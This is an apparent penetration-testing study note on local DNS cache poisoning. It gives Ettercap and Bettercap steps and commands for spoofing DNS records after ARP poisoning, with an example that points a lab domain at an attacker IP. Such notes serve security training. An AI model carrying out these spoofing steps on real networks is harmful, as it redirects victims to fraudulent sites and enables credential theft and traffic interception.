Local DNS Cache Poisoning

This attack involves altering legitimate DNS records with false information so that they can be used to redirect online traffic to a fraudulent website.

! It first requires ARP Poisoning on the victims.

Ettercap

GUI.

• Edit the /etc/ettercap/etter.dns file to map the target domain name you want to spoof and the IP address of the attacker you want to redirect a user to.

• Select targets (or even one) and add them to the scope.

• Activate the dns_spoof attack by navigating to Plugins > Manage Plugins.

# example step 1 
inlanefreight.com      A   192.168.225.110
*.inlanefreight.com    A   192.168.225.110

Bettercap

Command-line.

set dns.spoof.domains <DOMAIN>
# specific the domain you want to manipulate

set dns.spoof.address <IP>
# Specify which address the manipulated domain will point to

dns.spoof on/off

GUI.

sudo bettercap -eval "caplets.update; ui.update; q"

sudo bettercap -caplet http-ui 

Default credential: user:pass Change in /usr/share/bettercap/caplets/http-ui.cap